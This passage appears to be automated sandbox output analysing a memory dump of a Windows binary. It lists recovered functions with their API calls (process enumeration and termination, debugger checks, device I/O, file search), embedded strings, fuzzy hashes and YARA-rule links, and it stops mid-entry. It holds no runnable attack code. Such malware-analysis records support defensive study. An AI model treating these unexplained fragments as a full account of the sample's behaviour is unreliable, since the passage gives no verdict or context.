Process32NextW.KERNEL32(00000000,0000022C), ref: 004562E5
CloseHandle.KERNEL32(00000000), ref: 004562F1

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: CloseHandleProcessProcess32$CreateFirstH_prologNextOpenSnapshotTerminateToolhelp32
String ID:
API String ID: 1826667869-0
Opcode ID: 74dbe86706bb8beb0974baf6744c6b11537c72b33effb5ff934f7fe933f87b5d
Instruction ID: cdca48a62f3c255af95a2651484e0c862bb845f65dab0f10a1249e856f511285
Opcode Fuzzy Hash: 74dbe86706bb8beb0974baf6744c6b11537c72b33effb5ff934f7fe933f87b5d
Instruction Fuzzy Hash: E021D871A01719ABDB20AF64DC48BEE77BDFF04305F00005AF909D6581DBB88A84CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 004231B3, Relevance: 7.6, APIs: 5, Instructions: 84COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 004231C5

Part of subcall function 006850AE: RaiseException.KERNEL32(?,?,00579A90,?,?,00782B5C,?,?,?,?,?,00579A90,?,00776940,?), ref: 0068510D

GetLastError.KERNEL32(?,0077B2B0,?,004A5451,80004005,00795A54,?,004ED10E,00000000,?,00795A50,?,?,004ED4D5), ref: 004231CB

Part of subcall function 004231B3: LoadResource.KERNEL32(?,?,00795A50,?,?,8007000E,?,?,?,004A5451,80004005,00795A54,?,004ED10E,00000000), ref: 0042322C
Part of subcall function 004231B3: LockResource.KERNEL32(00000000,00795A54,?,?,00795A50,?,?,8007000E,?,?,?,004A5451,80004005,00795A54,?,004ED10E), ref: 00423238
Part of subcall function 004231B3: SizeofResource.KERNEL32(?,?,?,?,00795A50,?,?,8007000E,?,?,?,004A5451,80004005,00795A54,?,004ED10E), ref: 00423246

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: Resource$ErrorExceptionException@8LastLoadLockRaiseSizeofThrow
String ID:
API String ID: 294969344-0
Opcode ID: b446f370644f7f2f6f13515682f479e3ba7334d86d1b96779fc3e1f5997f54f5
Instruction ID: 04a12550aa672a69eb807832e2939eb74f06f05c9fad19abd4d90ad7b90dd5a2
Opcode Fuzzy Hash: b446f370644f7f2f6f13515682f479e3ba7334d86d1b96779fc3e1f5997f54f5
Instruction Fuzzy Hash: F4212631700238E7CB345E69AC4897B77BCEA4174279049ABFD4AD3611DA2CDE4081F9

Uniqueness

Uniqueness Score: -1.00%

Function 004276C4, Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 358COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 004277FF
__aulldvrm.LIBCMT ref: 004279A0
__aulldvrm.LIBCMT ref: 00427A33

Strings

d, xrefs: 0042773B

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: __aulldvrm
String ID: d
API String ID: 1302938615-2564639436
Opcode ID: b2a25141932dc4870ebcb4ef8da86e9f7f0c428abdb1b091bff6756494c1ce3c
Instruction ID: 45f3df42dc9291f8474769cedd739dfa76bd502a4fdfca550cdcdf9392b4eab8
Opcode Fuzzy Hash: b2a25141932dc4870ebcb4ef8da86e9f7f0c428abdb1b091bff6756494c1ce3c
Instruction Fuzzy Hash: 6FE1CA28F0D2D08EEB16DF6DA8A01AE7F729B9A310748C0DBC5D55B323C6385A15C779

Uniqueness

Uniqueness Score: -1.00%

Function 005C6B10, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74COMMON

Download Yara Rule

APIs

Part of subcall function 005C6650: CreateFileW.KERNEL32(00000000,00000007,00000007,00000007,00000007,00000007,00000007), ref: 005C6672

new.LIBCMT ref: 005C6B6F
DeviceIoControl.KERNEL32 ref: 005C6BAB

Strings

kv\, xrefs: 005C6B45

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ControlCreateDeviceFile
String ID: kv\
API String ID: 107608037-2692431484
Opcode ID: bca4a39e2e001cfc64acc6e97e14394fbea34cc49215cca7be5584164e4eaa36
Instruction ID: dcd0b85d79f4f4984b6184ccc1433d7b3066cf5f68bb6e69b449550d3a2f35db
Opcode Fuzzy Hash: bca4a39e2e001cfc64acc6e97e14394fbea34cc49215cca7be5584164e4eaa36
Instruction Fuzzy Hash: 9121C570A80209AEEB10DBD0CC57FAEBB78FB10714F500519F502B61C1EB796B48C665

Uniqueness

Uniqueness Score: -1.00%

Function 0058E501, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 0040F655: InitializeCriticalSectionEx.KERNEL32(00791710,00000000,00000000,007916FC,0058E530,?,?,?,0040F227), ref: 0040F65B
Part of subcall function 0040F655: GetLastError.KERNEL32(?,?,?,0040F227), ref: 0040F665

IsDebuggerPresent.KERNEL32(?,?,?,0040F227), ref: 0058E534
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0040F227), ref: 0058E543

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0058E53E

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: CriticalDebugDebuggerErrorInitializeLastOutputPresentSectionString
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 3511171328-631824599
Opcode ID: 258b51d3eaf69fada8bb27887d8afa14e30d0cf02f3c67afc6e50e55519f4161
Instruction ID: ead5b1c1752c72ef2320934cdd29c0559b7575ba36b96943b909a42a403fbfed
Opcode Fuzzy Hash: 258b51d3eaf69fada8bb27887d8afa14e30d0cf02f3c67afc6e50e55519f4161
Instruction Fuzzy Hash: 15E06D706007828FC360AF29E8093567BF5AF0470CF04892EE886E6B50EBB5E5498B91

Uniqueness

Uniqueness Score: -1.00%

Function 0042A2F9, Relevance: 4.6, APIs: 3, Instructions: 96comCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0042A2FE
CoCreateInstance.OLE32(007307C8,00000000,00000001,007334A8,?), ref: 0042A336
CoUninitialize.OLE32 ref: 0042A3C4

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: CreateH_prologInstanceUninitialize
String ID:
API String ID: 3567511364-0
Opcode ID: 1f03f06e3294b4fc189201b1293dedf025e61e306cb8247fc917c8278b999a5e
Instruction ID: cf7fc24cfc0150a611e92c85373f6a993a896c3cbc4221703469f3d38e1f8fec
Opcode Fuzzy Hash: 1f03f06e3294b4fc189201b1293dedf025e61e306cb8247fc917c8278b999a5e
Instruction Fuzzy Hash: 93318DB0B0021A9FDB04DFA9D884ABFBBB8FF48315B40452EF905E7201D7389941CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0068B781, Relevance: 4.6, APIs: 3, Instructions: 78COMMON

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 0068B879
SetUnhandledExceptionFilter.KERNEL32 ref: 0068B883
UnhandledExceptionFilter.KERNEL32(?), ref: 0068B890

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: d0cf191b7a2185ae1eabfbfb233e720abee1f700e0f5abce433bb1d7e91206b5
Instruction ID: 8ef98e4b72d5777eb0d5ca8696766688f5d1806c1edb6359cf232badccb796c4
Opcode Fuzzy Hash: d0cf191b7a2185ae1eabfbfb233e720abee1f700e0f5abce433bb1d7e91206b5
Instruction Fuzzy Hash: 5231D37490121C9BCB61EF64D888BDCBBB9BF08310F5052EAE40CA7290EB749B858F45

Uniqueness

Uniqueness Score: -1.00%

Function 004262FE, Relevance: 4.5, APIs: 3, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00426303
GetProcessHeap.KERNEL32(00000000,?), ref: 00426310
HeapAlloc.KERNEL32(00000000), ref: 00426317

Part of subcall function 0040F47D: __EH_prolog.LIBCMT ref: 0040F482

Part of subcall function 004AABCB: __CxxThrowException@8.LIBVCRUNTIME ref: 004AABE5

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prologHeap$AllocException@8ProcessThrow
String ID:
API String ID: 1492736669-0
Opcode ID: 47090d4aa977be75887a944815344dfbf59da01210cf46fa91a28da34ef70fdb
Instruction ID: a9801e617285fc71000d8e2eed60647cc8f82ececb05ca537498925362518fbc
Opcode Fuzzy Hash: 47090d4aa977be75887a944815344dfbf59da01210cf46fa91a28da34ef70fdb
Instruction Fuzzy Hash: 98E02671E00604A7DB10BFB0E909BAE7B39EF14301F00046AF90A96580DB3846148784

Uniqueness

Uniqueness Score: -1.00%

Function 0069B53C, Relevance: 4.5, APIs: 3, Instructions: 20COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000003,?,0069B512,00000003,0077A770,0000000C,0069B625,00000003,00000002,00000000,?,006974AB,00000003), ref: 0069B55D
TerminateProcess.KERNEL32(00000000,?,0069B512,00000003,0077A770,0000000C,0069B625,00000003,00000002,00000000,?,006974AB,00000003), ref: 0069B564
ExitProcess.KERNEL32 ref: 0069B576

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 06fc922c484beda1eee24f757212ac35e4212df45e4e41f06ac1bdabef57f781
Instruction ID: 908d1e1c5dce743f5677baef5ffa00af12940363aced6751595d5f665d4d41a7
Opcode Fuzzy Hash: 06fc922c484beda1eee24f757212ac35e4212df45e4e41f06ac1bdabef57f781
Instruction Fuzzy Hash: BAE04631401608EBCF11BF58EE48A983B6BEB41741F019015F8068AA31CB36DD42CA80

Uniqueness

Uniqueness Score: -1.00%

Function 005C7F30, Relevance: 3.2, APIs: 2, Instructions: 150fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,00000000,00730BA8,00000000,2ECD3809,?,005C72C7,00000000,?,?,?,?,?,?,006D2243,000000FF), ref: 005C801E
GetLastError.KERNEL32(?,?,?,?,?,?,006D2243,000000FF), ref: 005C8034

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ErrorFileFindFirstLast
String ID:
API String ID: 873889042-0
Opcode ID: 10c81ca79548f2944ec1fc35cd06edd2cd9814c05a0b18696a0fb306ee897997
Instruction ID: f174b873c36ecd8ea1ec34d09c771583f8a5e97e458c334812d3a11fd502f831
Opcode Fuzzy Hash: 10c81ca79548f2944ec1fc35cd06edd2cd9814c05a0b18696a0fb306ee897997
Instruction Fuzzy Hash: 3A517E719042489EDB24EFB8DC99FED7B68BF58304F10452EE816A7291DF785A08C764

Uniqueness

Uniqueness Score: -1.00%

Function 00426F7A, Relevance: 3.0, APIs: 2, Instructions: 37COMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNEL32(?,00000000,00000220,00000000,00000000,00000000,?,00000000,766F4074,00426F1B,?,?,00000000,00000000,?,00000000), ref: 00426F92
GetLastError.KERNEL32(?,00000000,766F4074,00426F1B,?,?,00000000,00000000,?,00000000,00000000,00000000), ref: 00426FB7

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ErrorFileFindFirstLast
String ID:
API String ID: 873889042-0
Opcode ID: 605aca7427b15fef47dd0f66ac59e5b99a97b8085837f499191c6aece445a078
Instruction ID: 81ad3060012dd1f7dbe57361802896eebfa2762599788e673d316f753473c9ca
Opcode Fuzzy Hash: 605aca7427b15fef47dd0f66ac59e5b99a97b8085837f499191c6aece445a078
Instruction Fuzzy Hash: 8FF059B2308320AAD7300A75BCC8FA73659EB80324F63092FF25BC61D0C774AC429279

Uniqueness

Uniqueness Score: -1.00%

Function 0040EA7D, Relevance: .1, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 38ea03e12312cbb099f93ec693dce9b2c2bb26ea3fcdf849024c3aeda9b258aa
Instruction ID: aa66d05171d9be8f527e265eac2fac4879e302e5f11ec8087246490d3ace24fd
Opcode Fuzzy Hash: 38ea03e12312cbb099f93ec693dce9b2c2bb26ea3fcdf849024c3aeda9b258aa
Instruction Fuzzy Hash: 8531E273A392858FC30DCB6D5C812A5BB74FB76210B14866BE845E72C2D2349516C7A4

Uniqueness

Uniqueness Score: -1.00%

Function 0051E426, Relevance: 63.1, APIs: 1, Strings: 35, Instructions: 111COMMON

Download Yara Rule

APIs

__swprintf.LEGACY_STDIO_DEFINITIONS ref: 0051E547

Strings

Bad type of mask argument, xrefs: 0051E487
The function/feature is not implemented, xrefs: 0051E493
No GPU support, xrefs: 0051E4A5
Backtrace, xrefs: 0051E559
No Error, xrefs: 0051E553
Bad number of channels, xrefs: 0051E4FA
Parsing error, xrefs: 0051E48D
Assertion failed, xrefs: 0051E49F
Unsupported format or combination of formats, xrefs: 0051E475
One of arguments' values is out of range, xrefs: 0051E46F
Autotrace call, xrefs: 0051E4EE
Insufficient memory, xrefs: 0051E56B
Sizes of input arguments do not match, xrefs: 0051E469
Input image depth is not supported by function, xrefs: 0051E500
status, xrefs: 0051E533, 0051E540
Null pointer, xrefs: 0051E4BD
Gpu API call, xrefs: 0051E4AB
Formats of input arguments do not match, xrefs: 0051E463
Inplace operation is not supported, xrefs: 0051E457
error, xrefs: 0051E52D
Bad argument, xrefs: 0051E50C
Bad flag (parameter or structure field), xrefs: 0051E47B
Iterations do not converge, xrefs: 0051E4E8
Requested object was not found, xrefs: 0051E45D
Memory block has been corrupted, xrefs: 0051E499
Image step is wrong, xrefs: 0051E4F4
Bad parameter of type CvPoint, xrefs: 0051E481
No OpenGL support, xrefs: 0051E4B1
OpenGL API call, xrefs: 0051E4B7
Input COI is not supported, xrefs: 0051E506
Unknown %s code %d, xrefs: 0051E541
Internal error, xrefs: 0051E565
Incorrect size of input array, xrefs: 0051E44B
Unspecified error, xrefs: 0051E55F
Division by zero occured, xrefs: 0051E451

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: __swprintf
String ID: Assertion failed$Autotrace call$Backtrace$Bad argument$Bad flag (parameter or structure field)$Bad number of channels$Bad parameter of type CvPoint$Bad type of mask argument$Division by zero occured$Formats of input arguments do not match$Gpu API call$Image step is wrong$Incorrect size of input array$Inplace operation is not supported$Input COI is not supported$Input image depth is not supported by function$Insufficient memory$Internal error$Iterations do not converge$Memory block has been corrupted$No Error$No GPU support$No OpenGL support$Null pointer$One of arguments' values is out of range$OpenGL API call$Parsing error$Requested object was not found$Sizes of input arguments do not match$The function/feature is not implemented$Unknown %s code %d$Unspecified error$Unsupported format or combination of formats$error$status
API String ID: 1857805200-1549692122
Opcode ID: e63df873889a26c5ab6202e68b6e2e20048a607ede884b5ae6ca508cb2c05d8f
Instruction ID: c887efe71252e1a851ed1a5e2bb630bde46a2e5805497e3eea38c33d8b61171f
Opcode Fuzzy Hash: e63df873889a26c5ab6202e68b6e2e20048a607ede884b5ae6ca508cb2c05d8f
Instruction Fuzzy Hash: AD21C469740815537F2CD23C18565AC1891FB96328FED03F9BA2AC3FE3E25DDE862146

Uniqueness

Uniqueness Score: -1.00%

Function 004081CB, Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 160COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004081D0
_strlen.LIBCMT ref: 004081F8

Part of subcall function 00411D9C: std::_Deallocate.LIBCONCRT ref: 00411DCC

_strlen.LIBCMT ref: 00408242
_strlen.LIBCMT ref: 00408289
_strlen.LIBCMT ref: 004082D0
_strlen.LIBCMT ref: 0040831A
_strlen.LIBCMT ref: 00408379

Part of subcall function 00680E81: __onexit.LIBCMT ref: 00680E87

Strings

B67AE8584CAA73B2, xrefs: 0040822D, 00408238, 00408249
B05688C2B3E6C1FD, xrefs: 00408355, 00408366, 00408380
A09E667F3BCC908B, xrefs: 004081E0, 004081EE, 004081FF
54FF53A5F1D36F1C, xrefs: 004082BB, 004082C6, 004082D7
10E527FADE682D1D, xrefs: 00408302, 0040830D, 00408321
C6EF372FE94F82BE, xrefs: 00408274, 0040827F, 00408290

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: _strlen$DeallocateH_prolog__onexitstd::_
String ID: 10E527FADE682D1D$54FF53A5F1D36F1C$A09E667F3BCC908B$B05688C2B3E6C1FD$B67AE8584CAA73B2$C6EF372FE94F82BE
API String ID: 1696903463-4081904993
Opcode ID: b77e105a51b720fd9d4185aa441025eb9108e19072a73530afe865c0796d8217
Instruction ID: 7f744be0e9c171b2b0d7ba9e4640e57a678475051a92aff0bfd608c140e3f002
Opcode Fuzzy Hash: b77e105a51b720fd9d4185aa441025eb9108e19072a73530afe865c0796d8217
Instruction Fuzzy Hash: 43517471C052589EDB50EBA9DD41BEDBBB4EF55300F2081AEE508F7242EB781E44CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00404416, Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 160COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0040441B
_strlen.LIBCMT ref: 00404443

Part of subcall function 00411D9C: std::_Deallocate.LIBCONCRT ref: 00411DCC

_strlen.LIBCMT ref: 0040448D
_strlen.LIBCMT ref: 004044D4
_strlen.LIBCMT ref: 0040451B
_strlen.LIBCMT ref: 00404565
_strlen.LIBCMT ref: 004045C4

Part of subcall function 00680E81: __onexit.LIBCMT ref: 00680E87

Strings

B67AE8584CAA73B2, xrefs: 00404478, 00404483, 00404494
B05688C2B3E6C1FD, xrefs: 004045A0, 004045B1, 004045CB
A09E667F3BCC908B, xrefs: 0040442B, 00404439, 0040444A
54FF53A5F1D36F1C, xrefs: 00404506, 00404511, 00404522
10E527FADE682D1D, xrefs: 0040454D, 00404558, 0040456C
C6EF372FE94F82BE, xrefs: 004044BF, 004044CA, 004044DB

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: _strlen$DeallocateH_prolog__onexitstd::_
String ID: 10E527FADE682D1D$54FF53A5F1D36F1C$A09E667F3BCC908B$B05688C2B3E6C1FD$B67AE8584CAA73B2$C6EF372FE94F82BE
API String ID: 1696903463-4081904993
Opcode ID: e06e3f126c16b95acf8ca4b1734f0444ec32761c6cf77d130a2167caa6935832
Instruction ID: c5bb358427bcc2aea0e05ed66ab769765244ca68499f520da75e88bbaab44791
Opcode Fuzzy Hash: e06e3f126c16b95acf8ca4b1734f0444ec32761c6cf77d130a2167caa6935832
Instruction Fuzzy Hash: 8751A671C052589EDB50EBB9D941BEDBBB4EF45310F2081AEE508F7242EB781E44CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0040C57A, Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 160COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0040C57F
_strlen.LIBCMT ref: 0040C5A7

Part of subcall function 00411D9C: std::_Deallocate.LIBCONCRT ref: 00411DCC

_strlen.LIBCMT ref: 0040C5F1
_strlen.LIBCMT ref: 0040C638
_strlen.LIBCMT ref: 0040C67F
_strlen.LIBCMT ref: 0040C6C9
_strlen.LIBCMT ref: 0040C728

Part of subcall function 00680E81: __onexit.LIBCMT ref: 00680E87

Strings

B67AE8584CAA73B2, xrefs: 0040C5DC, 0040C5E7, 0040C5F8
B05688C2B3E6C1FD, xrefs: 0040C704, 0040C715, 0040C72F
A09E667F3BCC908B, xrefs: 0040C58F, 0040C59D, 0040C5AE
54FF53A5F1D36F1C, xrefs: 0040C66A, 0040C675, 0040C686
10E527FADE682D1D, xrefs: 0040C6B1, 0040C6BC, 0040C6D0
C6EF372FE94F82BE, xrefs: 0040C623, 0040C62E, 0040C63F

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: _strlen$DeallocateH_prolog__onexitstd::_
String ID: 10E527FADE682D1D$54FF53A5F1D36F1C$A09E667F3BCC908B$B05688C2B3E6C1FD$B67AE8584CAA73B2$C6EF372FE94F82BE
API String ID: 1696903463-4081904993
Opcode ID: 83c3dd676aec0349e7259e0e32a968390db888d9843649c971db2fde3eef3265
Instruction ID: d61e2352111b57fc5a07dc01fa00389d2c24005564d8302c7e6cefb456e3b8db
Opcode Fuzzy Hash: 83c3dd676aec0349e7259e0e32a968390db888d9843649c971db2fde3eef3265
Instruction Fuzzy Hash: 6C51A371C052589EDB50EBA9D941BEDBBB4EF55300F2081AEE508F7242EB781E44CB69

Uniqueness

Uniqueness Score: -1.00%

Function 004025C9, Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 160COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004025CE
_strlen.LIBCMT ref: 004025F6

Part of subcall function 00411D9C: std::_Deallocate.LIBCONCRT ref: 00411DCC

_strlen.LIBCMT ref: 00402640
_strlen.LIBCMT ref: 00402687
_strlen.LIBCMT ref: 004026CE
_strlen.LIBCMT ref: 00402718
_strlen.LIBCMT ref: 00402777

Part of subcall function 00680E81: __onexit.LIBCMT ref: 00680E87

Strings

B67AE8584CAA73B2, xrefs: 0040262B, 00402636, 00402647
B05688C2B3E6C1FD, xrefs: 00402753, 00402764, 0040277E
A09E667F3BCC908B, xrefs: 004025DE, 004025EC, 004025FD
54FF53A5F1D36F1C, xrefs: 004026B9, 004026C4, 004026D5
10E527FADE682D1D, xrefs: 00402700, 0040270B, 0040271F
C6EF372FE94F82BE, xrefs: 00402672, 0040267D, 0040268E

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: _strlen$DeallocateH_prolog__onexitstd::_
String ID: 10E527FADE682D1D$54FF53A5F1D36F1C$A09E667F3BCC908B$B05688C2B3E6C1FD$B67AE8584CAA73B2$C6EF372FE94F82BE
API String ID: 1696903463-4081904993
Opcode ID: 58f816b0f3b05f73f207821064561839de6ea95639ec2c7faea9043250f36eb9
Instruction ID: a622d985120479e93d8e8798ec6509aa8c5c1d3dacfe7ac46bae674ca3ab94fb
Opcode Fuzzy Hash: 58f816b0f3b05f73f207821064561839de6ea95639ec2c7faea9043250f36eb9
Instruction Fuzzy Hash: 4E51A271C05258DEDB50EBA9D941BEDBBB4EF55300F2081AEE508F7242EB781E44CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0040A60D, Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 160COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0040A612
_strlen.LIBCMT ref: 0040A63A

Part of subcall function 00411D9C: std::_Deallocate.LIBCONCRT ref: 00411DCC

_strlen.LIBCMT ref: 0040A684
_strlen.LIBCMT ref: 0040A6CB
_strlen.LIBCMT ref: 0040A712
_strlen.LIBCMT ref: 0040A75C
_strlen.LIBCMT ref: 0040A7BB

Part of subcall function 00680E81: __onexit.LIBCMT ref: 00680E87

Strings

B67AE8584CAA73B2, xrefs: 0040A66F, 0040A67A, 0040A68B
B05688C2B3E6C1FD, xrefs: 0040A797, 0040A7A8, 0040A7C2
A09E667F3BCC908B, xrefs: 0040A622, 0040A630, 0040A641
54FF53A5F1D36F1C, xrefs: 0040A6FD, 0040A708, 0040A719
10E527FADE682D1D, xrefs: 0040A744, 0040A74F, 0040A763
C6EF372FE94F82BE, xrefs: 0040A6B6, 0040A6C1, 0040A6D2

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: _strlen$DeallocateH_prolog__onexitstd::_
String ID: 10E527FADE682D1D$54FF53A5F1D36F1C$A09E667F3BCC908B$B05688C2B3E6C1FD$B67AE8584CAA73B2$C6EF372FE94F82BE
API String ID: 1696903463-4081904993
Opcode ID: dbb54d4a9c3f6a8b1bad3e77f193e8dd41194fa33ffacf7269f8348464f402c3
Instruction ID: d35f8b15f21dd1954cdc35b333f03dc5de7c51ca6e66c0e378e7cadf9838d53e
Opcode Fuzzy Hash: dbb54d4a9c3f6a8b1bad3e77f193e8dd41194fa33ffacf7269f8348464f402c3
Instruction Fuzzy Hash: 8151A271C052589EDB50EBA9D941BEDBBB4EF45310F2081AEE508F7242EB781E44CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00408A96, Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 160COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00408A9B
_strlen.LIBCMT ref: 00408AC3

Part of subcall function 00411D9C: std::_Deallocate.LIBCONCRT ref: 00411DCC

_strlen.LIBCMT ref: 00408B0D
_strlen.LIBCMT ref: 00408B54
_strlen.LIBCMT ref: 00408B9B
_strlen.LIBCMT ref: 00408BE5
_strlen.LIBCMT ref: 00408C44

Part of subcall function 00680E81: __onexit.LIBCMT ref: 00680E87

Strings

B67AE8584CAA73B2, xrefs: 00408AF8, 00408B03, 00408B14
B05688C2B3E6C1FD, xrefs: 00408C20, 00408C31, 00408C4B
A09E667F3BCC908B, xrefs: 00408AAB, 00408AB9, 00408ACA
54FF53A5F1D36F1C, xrefs: 00408B86, 00408B91, 00408BA2
10E527FADE682D1D, xrefs: 00408BCD, 00408BD8, 00408BEC
C6EF372FE94F82BE, xrefs: 00408B3F, 00408B4A, 00408B5B

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: _strlen$DeallocateH_prolog__onexitstd::_
String ID: 10E527FADE682D1D$54FF53A5F1D36F1C$A09E667F3BCC908B$B05688C2B3E6C1FD$B67AE8584CAA73B2$C6EF372FE94F82BE
API String ID: 1696903463-4081904993
Opcode ID: c12256e9f14cdb7204775f1deb7aedeb5bc2198189d915bf19747df8f4f3ef8c
Instruction ID: 310caf5f3ddbba371bdccb2e27657faa00d2e05893bf7d58bd52ca9c81ff3696
Opcode Fuzzy Hash: c12256e9f14cdb7204775f1deb7aedeb5bc2198189d915bf19747df8f4f3ef8c
Instruction Fuzzy Hash: FA519371C052589EDB50EBA9D941BEDBBB4EF55300F2081AEE508F7242EB781E44CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00404D08, Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 160COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00404D0D
_strlen.LIBCMT ref: 00404D35

Part of subcall function 00411D9C: std::_Deallocate.LIBCONCRT ref: 00411DCC

_strlen.LIBCMT ref: 00404D7F
_strlen.LIBCMT ref: 00404DC6
_strlen.LIBCMT ref: 00404E0D
_strlen.LIBCMT ref: 00404E57
_strlen.LIBCMT ref: 00404EB6

Part of subcall function 00680E81: __onexit.LIBCMT ref: 00680E87

Strings

B67AE8584CAA73B2, xrefs: 00404D6A, 00404D75, 00404D86
B05688C2B3E6C1FD, xrefs: 00404E92, 00404EA3, 00404EBD
A09E667F3BCC908B, xrefs: 00404D1D, 00404D2B, 00404D3C
54FF53A5F1D36F1C, xrefs: 00404DF8, 00404E03, 00404E14
10E527FADE682D1D, xrefs: 00404E3F, 00404E4A, 00404E5E
C6EF372FE94F82BE, xrefs: 00404DB1, 00404DBC, 00404DCD

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: _strlen$DeallocateH_prolog__onexitstd::_
String ID: 10E527FADE682D1D$54FF53A5F1D36F1C$A09E667F3BCC908B$B05688C2B3E6C1FD$B67AE8584CAA73B2$C6EF372FE94F82BE
API String ID: 1696903463-4081904993
Opcode ID: 2f5654aa2aa22584da5e7867a6001f8b41bfe6df2e4532591357f09ea97a52ce
Instruction ID: c5a5fc0fe5cec96fa9b2fdecf2b40389d5f10bcfd957ea7437461dcb77e2bad2
Opcode Fuzzy Hash: 2f5654aa2aa22584da5e7867a6001f8b41bfe6df2e4532591357f09ea97a52ce
Instruction Fuzzy Hash: A9519371C052589EDB50EBA9D941BEDBBB4EF55300F2081AEE508F7242EB781E44CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0040CE45, Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 160COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0040CE4A
_strlen.LIBCMT ref: 0040CE72

Part of subcall function 00411D9C: std::_Deallocate.LIBCONCRT ref: 00411DCC

_strlen.LIBCMT ref: 0040CEBC
_strlen.LIBCMT ref: 0040CF03
_strlen.LIBCMT ref: 0040CF4A
_strlen.LIBCMT ref: 0040CF94
_strlen.LIBCMT ref: 0040CFF3

Part of subcall function 00680E81: __onexit.LIBCMT ref: 00680E87

Strings

B67AE8584CAA73B2, xrefs: 0040CEA7, 0040CEB2, 0040CEC3
